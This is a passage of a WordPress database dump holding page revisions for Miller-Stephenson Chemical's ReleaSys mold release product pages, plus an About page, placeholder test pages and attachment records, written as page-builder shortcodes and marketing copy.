span__sm="12"]\n\n[ux_image id="4391"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Pre-Cast / Reinformed Concrete</h2>\n<p>Miller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns. Most importantly, <b>ReleaSys™ CR </b> achieves all of this in a highly efficient and cost-effective system..</p>\n[button text="ReleaSys™ CR"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n\n[/section]', 'Choosing ReleaSys™ By Application', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-01 18:33:34', '2017-06-01 18:33:34', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4414, 2, '2017-06-01 18:36:16', '2017-06-01 18:36:16', '[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\n\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)" hover="glow" effect="sparkle"]\n\n[text_box text_color="dark" hover="fade-out" width="36" scale="79" padding="5px 30px 10px 30px" position_x="95" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\n\n<p>Miller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application specific sections below.</p>\n\n[/text_box]\n\n[/ux_banner]\n[divider align="center"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4351" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Advanced Composites</h2>\n<p>Modern composites and fiber-reinforced materials demand innovative, efficient mold release solutions.Products for this applicationneed to cure quickly, adhere strongly to the mold surface, and provide multiple releases per application with no contaminating transfer. <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ by providing a single-coat agent that does not require sealers or primers.</p>\n[button text="ReleaSys™ 8900" link="https://www.miller-stephenson.com/product/urethane-mold-release-agent/" target="https://www.miller-stephenson.com/product/urethane-mold-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4360" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rotational Plastics (Rotomolding)</h2>\n<p>Rotational Molding is a dynamic industry which utilizes an ever-widening variety of thermoplastic resins. In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolreance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, uniformity and multiple releases per application</p>\n[button text="ReleaSys™ RM"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4366" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Polyurethane-TPU</h2>\n<p>Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants of polyurethane(High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands on a release agent very high. Miller-Stephenson’s <b>ReleaSys™</b> release systems are specially formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenaciously to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass. ReleaSys provides the critical protection to your mold surface and highly effective release properties.</p>\n[button text="ReleaSys™ 8800" link="https://www.miller-stephenson.com/product/composite-mold-release-agent/" target="https://www.miller-stephenson.com/product/composite-mold-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4387" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rubber / Silicone / Elastomers</h2>\n<p>From Fluorosilicones to EPDM, Natural Rubber to Nitrile, and Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years. Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is non-silicone, water-based, low or no VOC, and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.</p>\n[button text="ReleaSys™ 8200" link="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/" target="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4332" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Injection Plastics Mold Release</h2>\n<p>There are numerous resins used in plastic injection molding,but regardless of the substrate, critical performance criteria exist for all mold release: Tenacious surface adhesion, protection of the mold surfaces, and superior part quality.Our <b>ReleaSys™</b> product line binds-to and protects even the most complex, highly polished molds, provides optimizes resin flow and generates higher part quality and lower scrap rates.</p>\n[button text="ReleaSys™ 9800" link="https://www.miller-stephenson.com/product/mold-release-coating/" target="https://www.miller-stephenson.com/product/mold-release-coating/"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4337" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Fiberglass Mold Release</h2>\n<p>Miller-Stephenson delivers the most durable, highest performing mold release agents to the aerospace and fiberglass industries. Our products provide multiple releases, critical tooling protection, and no transfer with only a single application. No time-consuming mold priming or sealing required. Whether you are doing hand layup, spray layup, filament winding, etc <b>ReleaSys™</b> has a cost-effective, efficient solution for you.</p>\n[button text="ReleaSys™ 9900" link="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/" target="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4391"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Pre-Cast / Reinformed Concrete</h2>\n<p>Miller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns. Most importantly, <b>ReleaSys™ CR </b> achieves all of this in a highly efficient and cost-effective system..</p>\n[button text="ReleaSys™ CR"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n\n[/section]', 'Choosing ReleaSys™ By Application', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-01 18:36:16', '2017-06-01 18:36:16', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4415, 2, '2017-06-01 18:40:47', '2017-06-01 18:40:47', '[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\n\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)"]\n\n[text_box text_color="dark" hover="fade-out" width="36" scale="79" padding="5px 30px 10px 30px" position_x="95" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\n\n<p>Miller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application specific sections below.</p>\n\n[/text_box]\n\n[/ux_banner]\n[divider align="center"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4351" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Advanced Composites</h2>\n<p>Modern composites and fiber-reinforced materials demand innovative, efficient mold release solutions.Products for this applicationneed to cure quickly, adhere strongly to the mold surface, and provide multiple releases per application with no contaminating transfer. <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ by providing a single-coat agent that does not require sealers or primers.</p>\n[button text="ReleaSys™ 8900" link="https://www.miller-stephenson.com/product/urethane-mold-release-agent/" target="https://www.miller-stephenson.com/product/urethane-mold-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4360" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rotational Plastics (Rotomolding)</h2>\n<p>Rotational Molding is a dynamic industry which utilizes an ever-widening variety of thermoplastic resins. In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolreance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, uniformity and multiple releases per application</p>\n[button text="ReleaSys™ RM"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4366" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Polyurethane-TPU</h2>\n<p>Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants of polyurethane(High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands on a release agent very high. Miller-Stephenson’s <b>ReleaSys™</b> release systems are specially formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenaciously to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass. ReleaSys provides the critical protection to your mold surface and highly effective release properties.</p>\n[button text="ReleaSys™ 8800" link="https://www.miller-stephenson.com/product/composite-mold-release-agent/" target="https://www.miller-stephenson.com/product/composite-mold-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4387" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rubber / Silicone / Elastomers</h2>\n<p>From Fluorosilicones to EPDM, Natural Rubber to Nitrile, and Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years. Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is non-silicone, water-based, low or no VOC, and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.</p>\n[button text="ReleaSys™ 8200" link="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/" target="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4332" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Injection Plastics Mold Release</h2>\n<p>There are numerous resins used in plastic injection molding,but regardless of the substrate, critical performance criteria exist for all mold release: Tenacious surface adhesion, protection of the mold surfaces, and superior part quality.Our <b>ReleaSys™</b> product line binds-to and protects even the most complex, highly polished molds, provides optimizes resin flow and generates higher part quality and lower scrap rates.</p>\n[button text="ReleaSys™ 9800" link="https://www.miller-stephenson.com/product/mold-release-coating/" target="https://www.miller-stephenson.com/product/mold-release-coating/"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4337" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Fiberglass Mold Release</h2>\n<p>Miller-Stephenson delivers the most durable, highest performing mold release agents to the aerospace and fiberglass industries. Our products provide multiple releases, critical tooling protection, and no transfer with only a single application. No time-consuming mold priming or sealing required. Whether you are doing hand layup, spray layup, filament winding, etc <b>ReleaSys™</b> has a cost-effective, efficient solution for you.</p>\n[button text="ReleaSys™ 9900" link="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/" target="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4391"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Pre-Cast / Reinformed Concrete</h2>\n<p>Miller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns. Most importantly, <b>ReleaSys™ CR </b> achieves all of this in a highly efficient and cost-effective system..</p>\n[button text="ReleaSys™ CR"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n\n[/section]', 'Choosing ReleaSys™ By Application', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-01 18:40:47', '2017-06-01 18:40:47', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4416, 2, '2017-06-01 18:50:30', '2017-06-01 18:50:30', 'test', 'tes', '', 'publish', 'closed', 'closed', '', 'tes', '', '', '2017-06-01 18:50:30', '2017-06-01 18:50:30', '', 0, 'https://www.miller-stephenson.com/?page_id=4416', 0, 'page', '', 0); 
INSERT INTO `wp_posts` VALUES (4417, 2, '2017-06-01 18:45:43', '2017-06-01 18:45:43', '[featured_box title="Title text" img="http://iconurl" img_width="" link=""]\r\n\r\nFeatured box text\r\n\r\n[/featured_box]', 'tes', '', 'inherit', 'closed', 'closed', '', '4416-revision-v1', '', '', '2017-06-01 18:45:43', '2017-06-01 18:45:43', '', 4416, 'https://www.miller-stephenson.com/4416-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4418, 2, '2017-06-01 18:46:27', '2017-06-01 18:46:27', '[ux_banner bg="https://www.miller-stephenson.com/wp-content/uploads/2017/06/shutterstock_551871304.jpg" height="500px" text_color="light" text_align="center" text_pos="center" text_width="70%" parallax_text="0" parallax="0" effect=""]\r\n<h4 class="alt-font">Smaller On Top</h4>\r\n___\r\n<h1>BIG HEADLINE</h1>\r\n<h4 class="thin-font">A smaller text under headline</h4>\r\n[button text="button" link="#" size="medium" style="is-outline white"]\r\n\r\n[/ux_banner]', 'tes', '', 'inherit', 'closed', 'closed', '', '4416-revision-v1', '', '', '2017-06-01 18:46:27', '2017-06-01 18:46:27', '', 4416, 'https://www.miller-stephenson.com/4416-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4419, 2, '2017-06-01 18:49:16', '2017-06-01 18:49:16', '[ux_banner bg="https://www.miller-stephenson.com/wp-content/uploads/2017/06/shutterstock_551871304.jpg" height="100px" text_color="light" text_align="center" text_pos="center" text_width="70%" parallax_text="0" parallax="0" effect=""]\r\n<h4 class="alt-font">Smaller On Top</h4>\r\n___\r\n<h1>MOLD RELEASE AGENT</h1>\r\nProduct applifcation Finder\r\n<h4 class="thin-font">[button text="Applications" link="https://www.miller-stephenson.com/release-agent-applications/" size="medium" style="is-outline white"]</h4>\r\n[/ux_banner]', 'tes', '', 'inherit', 'closed', 'closed', '', '4416-revision-v1', '', '', '2017-06-01 18:49:16', '2017-06-01 18:49:16', '', 4416, 'https://www.miller-stephenson.com/4416-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4420, 2, '2017-06-01 18:50:30', '2017-06-01 18:50:30', ' ', '', '', 'publish', 'closed', 'closed', '', '4420', '', '', '2017-06-01 18:50:30', '2017-06-01 18:50:30', '', 0, 'https://www.miller-stephenson.com/4420/', 13, 'nav_menu_item', '', 0); 
INSERT INTO `wp_posts` VALUES (4421, 2, '2017-06-01 18:50:30', '2017-06-01 18:50:30', 'test', 'tes', '', 'inherit', 'closed', 'closed', '', '4416-revision-v1', '', '', '2017-06-01 18:50:30', '2017-06-01 18:50:30', '', 4416, 'https://www.miller-stephenson.com/4416-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4422, 2, '2017-06-01 19:20:03', '2017-06-01 19:20:03', '', 'miller-stephenson-promo', '', 'inherit', 'closed', 'closed', '', 'miller-stephenson-promo', '', '', '2017-06-01 19:24:26', '2017-06-01 19:24:26', '', 204, 'https://www.miller-stephenson.com/wp-content/uploads/2017/06/Miller-Stephenson-Promo.mp4', 0, 'attachment', 'video/mp4', 0); 
INSERT INTO `wp_posts` VALUES (4423, 2, '2017-06-01 19:23:36', '2017-06-01 19:23:36', '[row]\n\n[col]\n\n[ux_video url="https://www.youtube.com/watch?v=tbzqYPsuauI"]\n\n\n[/col]\n\n[/row]\n<p>On The Cutting Edge of the Performance Chemical Market\nMiller-Stephenson Chemical Company specializes in providing the most robust, efficient, and highest performing chemical solutions to all industrial sectors.  Our innovative Research and Development team is in constant pursuit of the most technologically advanced materials to better serve our diverse customer base.  Our new product pipeline is highly agile, constantly adjusting to develop solutions to the most stringent performance requirements.  We strive to understand your unique business and engineering requirements and our dedicated technical team helps you find a solution.  If our current portfolio can not solve your issue we hold the technical, material acquisition, and formulation capacity to develop a specialized solution to meet your needs.\n</p>\n<p>Miller-Stephenson Chemical Company, founded in 1955.\nLooking back at over 60 years of success, Miller-Stephenson provides superior chemical solutions for a wide range of industries. We are committed to providing customers with industry-leading customer service, delivery and technical support to ensure our customers are successful. We strategically maintain four facilities throughout the United States and Canada to ensure prompt customer service and efficient delivery. Distribution outside North America is handled through authorized distributors. If you have any questions, feel free to contact our Customer Service Department.\n.\n</p>\n[row]\n\n[col span="4"]\n\n[ux_image id="1054"]\n\n\n[/col]\n[col span="4"]\n\n[ux_image id="142"]\n\n\n[/col]\n[col span="4"]\n\n[ux_image id="87"]\n\n\n[/col]\n\n[/row]', 'About', '', 'inherit', 'closed', 'closed', '', '204-revision-v1', '', '', '2017-06-01 19:23:36', '2017-06-01 19:23:36', '', 204, 'https://www.miller-stephenson.com/204-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4424, 2, '2017-06-01 19:25:00', '2017-06-01 19:25:00', '[row]\n\n[col]\n\n[ux_video url="https://www.youtube.com/watch?v=tbzqYPsuauI"]\n\n[/col]\n\n[/row]\n\n[video width="1280" height="720" mp4="https://www.miller-stephenson.com/wp-content/uploads/2017/06/Miller-Stephenson-Promo.mp4"][/video]\n\n<strong>On The Cutting Edge of the Performance Chemical Market</strong>\nMiller-Stephenson Chemical Company specializes in providing the most robust, efficient, and highest performing chemical solutions to all industrial sectors. Our innovative Research and Development team is in constant pursuit of the most technologically advanced materials to better serve our diverse customer base. Our new product pipeline is highly agile, constantly adjusting to develop solutions to the most stringent performance requirements. We strive to understand your unique business and engineering requirements and our dedicated technical team helps you find a solution. If our current portfolio can not solve your issue we hold the technical, material acquisition, and formulation capacity to develop a specialized solution to meet your needs.\n\n<strong>Miller-Stephenson Chemical Company, founded in 1955</strong>\nLooking back at over 60 years of success, Miller-Stephenson provides superior chemical solutions for a wide range of industries. We are committed to providing customers with industry-leading customer service, delivery and technical support to ensure our customers are successful. We strategically maintain four facilities throughout the United States and Canada to ensure prompt customer service and efficient delivery. Distribution outside North America is handled through authorized distributors. If you have any questions, feel free to contact our Customer Service Department.\n.\n\n[row]\n\n[col span="4"]\n\n[ux_image id="1054"]\n\n[/col]\n[col span="4"]\n\n[ux_image id="142"]\n\n[/col]\n[col span="4"]\n\n[ux_image id="87"]\n\n[/col]\n\n[/row]', 'About', '', 'inherit', 'closed', 'closed', '', '204-autosave-v1', '', '', '2017-06-01 19:25:00', '2017-06-01 19:25:00', '', 204, 'https://www.miller-stephenson.com/204-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4425, 2, '2017-06-01 19:25:03', '2017-06-01 19:25:03', '[row]\r\n\r\n[col]\r\n\r\n[ux_video url="https://www.youtube.com/watch?v=tbzqYPsuauI"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n<strong>On The Cutting Edge of the Performance Chemical Market</strong>\r\nMiller-Stephenson Chemical Company specializes in providing the most robust, efficient, and highest performing chemical solutions to all industrial sectors. Our innovative Research and Development team is in constant pursuit of the most technologically advanced materials to better serve our diverse customer base. Our new product pipeline is highly agile, constantly adjusting to develop solutions to the most stringent performance requirements. We strive to understand your unique business and engineering requirements and our dedicated technical team helps you find a solution. If our current portfolio can not solve your issue we hold the technical, material acquisition, and formulation capacity to develop a specialized solution to meet your needs.\r\n\r\n<strong>Miller-Stephenson Chemical Company, founded in 1955</strong>\r\nLooking back at over 60 years of success, Miller-Stephenson provides superior chemical solutions for a wide range of industries. We are committed to providing customers with industry-leading customer service, delivery and technical support to ensure our customers are successful. We strategically maintain four facilities throughout the United States and Canada to ensure prompt customer service and efficient delivery. Distribution outside North America is handled through authorized distributors. If you have any questions, feel free to contact our Customer Service Department.\r\n.\r\n\r\n[row]\r\n\r\n[col span="4"]\r\n\r\n[ux_image id="1054"]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_image id="142"]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_image id="87"]\r\n\r\n[/col]\r\n\r\n[/row]', 'About', '', 'inherit', 'closed', 'closed', '', '204-revision-v1', '', '', '2017-06-01 19:25:03', '2017-06-01 19:25:03', '', 204, 'https://www.miller-stephenson.com/204-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4426, 0, '2017-06-01 20:48:01', '2017-06-01 20:48:01', '', '', '', 'publish', 'closed', 'closed', '', '4426', '', '', '2017-06-01 20:48:02', '2017-06-01 20:48:02', '', 0, 'https://www.miller-stephenson.com/nf_sub/4426/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4427, 0, '2017-06-02 13:32:44', '2017-06-02 13:32:44', '', '', '', 'publish', 'closed', 'closed', '', '4427', '', '', '2017-06-02 13:32:45', '2017-06-02 13:32:45', '', 0, 'https://www.miller-stephenson.com/nf_sub/4427/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4428, 3, '2017-06-02 14:42:22', '2017-06-02 14:42:22', '[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\n\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)"]\n\n[text_box text_color="dark" hover="fade-out" width="36" scale="79" padding="5px 30px 10px 30px" position_x="95" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\n\n<p>Miller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application specific sections below.</p>\n\n[/text_box]\n\n[/ux_banner]\n[divider align="center"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4351" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Advanced Composites</h2>\n<p>Modern composites and fiber-reinforced materials demand innovative, efficient mold release solutions.Products for this applicationneed to cure quickly, adhere strongly to the mold surface, and provide multiple releases per application with no contaminating transfer. <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ by providing a single-coat agent that does not require sealers or primers.</p>\n[button text="ReleaSys™ 8900" link="https://www.miller-stephenson.com/product/urethane-mold-release-agent/" target="https://www.miller-stephenson.com/product/urethane-mold-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4360" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rotational Plastics (Rotomolding)</h2>\n<p>Rotational Molding is a dynamic industry which utilizes an ever-widening variety of thermoplastic resins. In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolreance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, uniformity and multiple releases per application</p>\n[button text="ReleaSys™ RM" link="https://www.miller-stephenson.com/product/rotational-molding-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4366" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Polyurethane-TPU</h2>\n<p>Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants of polyurethane(High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands on a release agent very high. Miller-Stephenson’s <b>ReleaSys™</b> release systems are specially formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenaciously to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass. ReleaSys provides the critical protection to your mold surface and highly effective release properties.</p>\n[button text="ReleaSys™ 8800" link="https://www.miller-stephenson.com/product/composite-mold-release-agent/" target="https://www.miller-stephenson.com/product/composite-mold-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4387" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rubber / Silicone / Elastomers</h2>\n<p>From Fluorosilicones to EPDM, Natural Rubber to Nitrile, and Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years. Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is non-silicone, water-based, low or no VOC, and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.</p>\n[button text="ReleaSys™ 8200" link="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/" target="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4332" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Injection Plastics Mold Release</h2>\n<p>There are numerous resins used in plastic injection molding,but regardless of the substrate, critical performance criteria exist for all mold release: Tenacious surface adhesion, protection of the mold surfaces, and superior part quality.Our <b>ReleaSys™</b> product line binds-to and protects even the most complex, highly polished molds, provides optimizes resin flow and generates higher part quality and lower scrap rates.</p>\n[button text="ReleaSys™ 9800" link="https://www.miller-stephenson.com/product/mold-release-coating/" target="https://www.miller-stephenson.com/product/mold-release-coating/"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4337" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Fiberglass Mold Release</h2>\n<p>Miller-Stephenson delivers the most durable, highest performing mold release agents to the aerospace and fiberglass industries. Our products provide multiple releases, critical tooling protection, and no transfer with only a single application. No time-consuming mold priming or sealing required. Whether you are doing hand layup, spray layup, filament winding, etc <b>ReleaSys™</b> has a cost-effective, efficient solution for you.</p>\n[button text="ReleaSys™ 9900" link="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/" target="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" 